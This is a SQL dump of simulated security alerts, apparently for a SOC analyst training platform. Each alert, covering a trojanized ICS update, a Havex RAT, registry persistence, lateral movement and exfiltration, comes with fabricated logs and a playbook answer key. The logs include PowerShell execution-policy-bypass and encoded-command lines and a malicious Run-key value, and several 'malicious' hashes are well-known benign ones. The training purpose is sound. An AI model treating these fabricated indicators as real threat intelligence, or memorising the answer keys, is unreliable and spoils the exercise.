INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(466, 'Initial Access: Trojanized Software Update Detected', 'high', 'Software Update Logs', 'A trojanized software update for the ICS system has been detected. This update was distributed by attackers to gain initial access into the network by compromising the supply chain of the legitimate software provider.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:32:10Z\",\"event_type\":\"software_update\",\"software_name\":\"ICS_Control_Update\",\"version\":\"v2.3.4\",\"update_status\":\"completed\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"destination_user\":\"admin\",\"file_path\":\"/usr/local/ics_control/update_v2.3.4.exe\",\"signature_status\":\"invalid\",\"detected_malware\":\"Trojan.IcsMalware\",\"internal_ip_range\":\"192.168.0.0/16\"}', '2026-01-05 03:02:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of target device.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known trojanized update.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/usr/local/ics_control/update_v2.3.4.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file path for trojanized 
software.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.076Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:32:10Z\\\",\\\"event_type\\\":\\\"software_update\\\",\\\"software_name\\\":\\\"ICS_Control_Update\\\",\\\"version\\\":\\\"v2.3.4\\\",\\\"update_status\\\":\\\"completed\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"file_path\\\":\\\"/usr/local/ics_control/update_v2.3.4.exe\\\",\\\"signature_status\\\":\\\"invalid\\\",\\\"detected_malware\\\":\\\"Trojan.IcsMalware\\\",\\\"internal_ip_range\\\":\\\"192.168.0.0/16\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.076Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:32:10Z\\\",\\\"event_type\\\":\\\"software_update\\\",\\\"software_name\\\":\\\"ICS_Control_Update\\\",\\\"version\\\":\\\"v2.3.4\\\",\\\"update_status\\\":\\\"completed\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"file_path\\\":\\\"/usr/local/ics_control/update_v2.3.4.exe\\\",\\\"signature_status\\\":\\\"invalid\\\",\\\"detected_malware\\\":\\\"Trojan.IcsMalware\\\",\\\"internal_ip_range\\\":\\\"192.168.0.0/16\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.076Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:32:10Z\\\",\\\"event_type\\\":\\\"software_update\\\",\\\"software_name\\\":\\\"ICS_Control_Update\\\",\\\"version\\\":\\\"v2.3.4\\\",\\\"update_status\\\":\\\"completed\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"file_path\\\":\\\"/usr/local/ics_control/update_v2.3.4.exe\\\",\\\"signature_status\\\":\\\"invalid\\\",\\\"detected_malware\\\":\\\"Trojan.IcsMalware\\\",\\\"internal_ip_range\\\":\\\"192.168.0.0/16\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.076Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:32:10Z\\\",\\\"event_type\\\":\\\"software_update\\\",\\\"software_name\\\":\\\"ICS_Control_Update\\\",\\\"version\\\":\\\"v2.3.4\\\",\\\"update_status\\\":\\\"completed\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"file_path\\\":\\\"/usr/local/ics_control/update_v2.3.4.exe\\\",\\\"signature_status\\\":\\\"invalid\\\",\\\"detected_malware\\\":\\\"Trojan.IcsMalware\\\",\\\"internal_ip_range\\\":\\\"192.168.0.0/16\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.076Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:32:10Z\\\",\\\"event_type\\\":\\\"software_update\\\",\\\"software_name\\\":\\\"ICS_Control_Update\\\",\\\"version\\\":\\\"v2.3.4\\\",\\\"update_status\\\":\\\"completed\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"file_path\\\":\\\"/usr/local/ics_control/update_v2.3.4.exe\\\",\\\"signature_status\\\":\\\"invalid\\\",\\\"detected_malware\\\":\\\"Trojan.IcsMalware\\\",\\\"internal_ip_range\\\":\\\"192.168.0.0/16\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(467, 'Execution: \'Havex\' RAT Deployment', 'high', 'Endpoint Detection and Response (EDR)', 'Following the initial access, \'Havex\' RAT is executed to provide attackers with remote control over the compromised systems. The malware was identified running on a critical server, attempting to establish outbound connections to known malicious IPs.', 'Remote Access Trojan', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T15:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"compromised_user\",\"process\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\havex.ps1\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\havex.ps1\",\"alert_generated\":true}', '2026-01-05 03:02:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 servers for Havex RAT.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by the attack.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Havex RAT payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"havex.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR Analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to execute Havex 
RAT.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(468, 'Persistence: Registry Modification Identified', 'high', 'Registry Logs', 'The attackers modify registry settings to maintain persistence, ensuring their presence even after system reboots.', 'Persistence Mechanism', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:07Z\",\"event_id\":4657,\"computer_name\":\"WIN-EXAMPLE\",\"user\":\"malicious_user\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"operation\":\"SetValue\",\"value_name\":\"SuspiciousProgram\",\"value_type\":\"REG_SZ\",\"value_data\":\"C:\\\\malicious\\\\malware.exe\",\"attacker_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.42\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-05 03:02:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.42\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample used by attackers.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Monitoring\",\"verdict\":\"suspicious\",\"details\":\"User involved in unauthorized registry modifications.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"WIN-EXAMPLE\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"operation\\\":\\\"SetValue\\\",\\\"value_name\\\":\\\"SuspiciousProgram\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\malicious\\\\\\\\malware.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.42\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"WIN-EXAMPLE\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"operation\\\":\\\"SetValue\\\",\\\"value_name\\\":\\\"SuspiciousProgram\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\malicious\\\\\\\\malware.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.42\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"WIN-EXAMPLE\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"operation\\\":\\\"SetValue\\\",\\\"value_name\\\":\\\"SuspiciousProgram\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\malicious\\\\\\\\malware.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.42\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"WIN-EXAMPLE\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"operation\\\":\\\"SetValue\\\",\\\"value_name\\\":\\\"SuspiciousProgram\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\malicious\\\\\\\\malware.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.42\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"WIN-EXAMPLE\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"operation\\\":\\\"SetValue\\\",\\\"value_name\\\":\\\"SuspiciousProgram\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\malicious\\\\\\\\malware.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.42\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(469, 'Lateral Movement: SMB Traffic Anomaly', 'high', 'Network Traffic Analysis', 'The network traffic analysis has detected anomalous SMB traffic consistent with lateral movement activities. Using the \'Havex\' Remote Access Trojan (RAT), attackers are performing network reconnaissance to map the industrial control network. This involves the identification of other critical systems within the network by exploiting the SMB protocol.', 'Network Reconnaissance', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-22T14:23:55Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.75\",\"destination_port\":445,\"protocol\":\"SMB\",\"malware_name\":\"Havex\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"username\":\"john.doe\",\"filename\":\"netmap.exe\",\"external_attacker_ip\":\"203.0.113.45\"}', '2026-01-05 03:02:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local IP address within the internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical system identified within the internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with the Havex RAT.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Public IP address related to known malicious activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"netmap.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File 
Analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable file used for network reconnaissance.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(470, 'Exfiltration: Unusual Data Transfer Detected', 'high', 'Data Loss Prevention (DLP) Systems', 'The DLP system detected an unusual data transfer from an internal host within the industrial control network to an external IP address. This exfiltration attempt involved sensitive files related to ICS operations, indicating a successful completion of the attackers\' objective.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"internal_ip\":\"192.168.5.23\",\"external_ip\":\"85.234.167.90\",\"filename\":\"ICS_Project_Plan.pdf\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"j.doe\",\"transfer_protocol\":\"HTTPS\",\"data_volume\":\"150MB\",\"detection_method\":\"Content Inspection\",\"alert_id\":\"DLP-EXFIL-20231015-001\"}', '2026-01-05 03:02:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host within the ICS network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"85.234.167.90\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous cyber attacks\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ICS_Project_Plan.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive ICS document\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malware associated with this hash\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal 
HR\",\"verdict\":\"internal\",\"details\":\"Active employee\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"internal_ip\\\":\\\"192.168.5.23\\\",\\\"external_ip\\\":\\\"85.234.167.90\\\",\\\"filename\\\":\\\"ICS_Project_Plan.pdf\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"j.doe\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"detection_method\\\":\\\"Content Inspection\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"internal_ip\\\":\\\"192.168.5.23\\\",\\\"external_ip\\\":\\\"85.234.167.90\\\",\\\"filename\\\":\\\"ICS_Project_Plan.pdf\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"j.doe\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"detection_method\\\":\\\"Content Inspection\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"internal_ip\\\":\\\"192.168.5.23\\\",\\\"external_ip\\\":\\\"85.234.167.90\\\",\\\"filename\\\":\\\"ICS_Project_Plan.pdf\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"j.doe\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"detection_method\\\":\\\"Content Inspection\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"internal_ip\\\":\\\"192.168.5.23\\\",\\\"external_ip\\\":\\\"85.234.167.90\\\",\\\"filename\\\":\\\"ICS_Project_Plan.pdf\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"j.doe\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"detection_method\\\":\\\"Content Inspection\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"internal_ip\\\":\\\"192.168.5.23\\\",\\\"external_ip\\\":\\\"85.234.167.90\\\",\\\"filename\\\":\\\"ICS_Project_Plan.pdf\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"j.doe\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"detection_method\\\":\\\"Content Inspection\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(471, 'Suspicious Wi-Fi Network Activity', 'high', 'Network traffic logs', 'DarkHotel initiated an operation by compromising a hotel\'s Wi-Fi network. The network traffic logs indicate suspicious activity from an external IP address, suggesting an attempt to gain initial access to target devices.', 'Initial Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:15Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"203.0.113.45\",\"src_port\":443,\"dst_port\":8080,\"protocol\":\"HTTPS\",\"username\":\"guest_user\",\"file\":{\"filename\":\"trojan_hotel.exe\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"},\"action\":\"connection_attempt\",\"result\":\"success\",\"log_id\":\"abcd1234\"}', '2026-01-05 03:04:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"This IP is known to be associated with DarkHotel APT 